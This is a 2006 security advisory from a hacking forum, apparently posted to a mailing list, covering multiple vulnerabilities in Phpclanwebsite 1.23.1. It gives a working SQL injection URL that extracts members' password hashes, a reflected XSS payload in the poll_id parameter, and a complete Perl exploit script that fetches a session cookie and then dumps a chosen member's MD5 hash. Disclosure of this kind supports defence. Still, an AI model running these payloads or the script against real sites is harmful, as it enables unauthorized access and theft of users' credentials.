<<< Date Index >>>     <<< Thread Index >>>

HYSA-2006-002 Phpclanwebsite 1.23.1 Multiple Vulnerabilities



------------------------------------------------------ 
      HYSA-2006-002 h4cky0u.org Advisory 011 
------------------------------------------------------ 
Date - Thu Jan 26 2006 



TITLE: 
====== 


Phpclanwebsite 1.23.1 Multiple Vulnerabilities 



SEVERITY: 
========= 


High 



SOFTWARE: 
========= 


Phpclanwebsite 1.23.1 



INFO: 
===== 


Phpclanwebsite is a webpage content manager designed specifically for 
the online gaming community. For clans it not only provides a stunning 
impressive website, it allows you to manage your members and their 
details. The nature of clans means that members come and go and to 
ease the burden of keeping your website up to date, phpclanwebsite has 
an easy to use member panel that allows a clan admin to easily add, 
update or remove members from your list. This similtaneously updates 
multiple areas on your website that relies on this data (Member List, 
Member access to password protected areas, Members email and msn 
addresses from your distribution list) 


http://www.phpclanwebsite.com/ 



DESCRIPTION: 
============ 


Phpclanwebsite 1.23.1 is vulnerable to multiple vulnerabilities, but 
the most dangerouse of all is a sql injection bug I found that can 
give a attacker the md5 hash of the administrator or some other user 
of the forum. Here is an example: 


http://127.0.0.1/phpclan/index.php?page=forum&func=post&par=2%20UNION%20SELECT%20null,null,null,null,null,null,password,null%20FROM%20cws_members%20WHERE%20member_id=3/*
 


If you know how sql injection attacks work you can make more complex 
queries to the server. The second bug I found will give you a error 
and the path to uploader.php. All you need to do is log in with admin 
previlegues and go to index.php?page=uploader from then for a file 
specify something like "\" and you will get the error message(for me 
this is a file inclusion problem). And finally the last hole that I 
have found for now is again a sql injection one but also a XSS.Here is 
how it works: 


Go to index.php?page=polllist (you don't need to be logged in) then 
click on some of the pools, like "What do you think about this page" 
(if there are any) and then it will redirect you to something like 
index.php?page=pollresults&poll_id=1 from then you type 
index.php?page=pollresults&poll_id='><script>alert('The Bug Hunter 
matrix_killer is back');</script> and you hit the "Enter" button on 
you keyboard. 


Then go to some other page of your menu like "Home" and a windows will 
pop-up with your text + you will see a sql syntax error[this bug may 
not work on some machines] 



PROOF OF CONCEPT CODE: 
====================== 


#!perl 
#Phpclanwebsite 1.23.1 SQL injection exploit by matrix_killer 
#Greets to all omega-team members[and specially to EcLiPsE] and also 
to h4cky0u[h4cky0u.org], Alpha-Fan, Chameleon and all my friends 
#The exploit was tested on phpclan's website and it worked + my local 
server and on ra4ev.com 
#But on versions below 1.23.1 it doesn't seem to work 


use IO::Socket; 
$host = $ARGV[0]; 
$path = $ARGV[1]; 
$topic = $ARGV[2]; 
$id = $ARGV[3]; 


if (ARGV < 4) { 
  print "---------------------------------------------------------\n"; 
  print "-- Phpclanwebsite 1.23.1 SQL Injection sploit --\n"; 
  print "-- (C)oded by matrix_killer --\n"; 
  print "-- Contact: matrix_k\abv.bg || matrix_killer\ra4ev.com --\n"; 
  print "-- Usage: $0 [host] [path] [topic] [id] --\n"; 
  print "-- Ex: $0 127.0.0.1 cws 2 2 --\n"; 
  print "---------------------------------------------------------\n"; 
  exit(); 
} 
$sock = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => 
"80",Proto => "tcp") || die "Can't establish a connection\n"; 


print $sock "GET /$path/index.php?page=forum&func=post&par=$topic HTTP/1.1\n"; 
print $sock "User-Agent: Mozilla/4.0\n"; 
print $sock "Host: $host\n\n"; 
while ($asd = <$sock>) { 
        if ($asd =~ /Set-Cookie:/gi) { 
             $asd =~ /cuser_id=([a-zA-Z0-9]{32})/; 
             $cookie = $1; 
        } 
} 
$sock->close; 


$socket = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => 
"80",Proto => "tcp") || die "Can't establish a connection\n"; 
print "-- Connection Established --\n"; 


print $socket "GET 
/$path/index.php?page=forum&func=post&par=$topic%20UNION%20SELECT%20null,null,null,null,null,null,password,null%20FROM%20cws_members%20WHERE%20member_id=$id/*
 
HTTP/1.0\n"; 
print $socket "User-Agent: Mozilla/4.0\n"; 
print $socket "Host: $host\n"; 
print $socket "Cookie: cuser_id=$cookie; chitcounter=hitcounter\n\n"; 
print "-- Waiting... --\n"; 


while($ans = <$socket>) { 
       if ($ans =~ /([a-zA-Z0-9]{32})/){ 
            if ($ans =~ /cookie/i) { 
                 next; 
            } 
            print "\nmember id: $id \n"; 
            print "md5 hash: $1 \n"; 
            exit; 
       } 
} 
print "Sorry there s33ms to be a problem\n"; 



VENDOR STATUS 
============= 


Vendor was contacted repeatedly but no response received till date. 



CREDITS: 
======== 


This vulnerability was discovered and researched by - 


matrix_killer of h4cky0u Security Forums. 



mail : matrix_k at abv dot bg 


web : http://www.h4cky0u.org 


Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!! 



ORIGINAL ADVISORY: 
================== 


http://www.h4cky0u.org/advisories/HYSA-2006-002-phpclan.txt 


-- 
http://www.h4cky0u.org 
(In)Security at its best...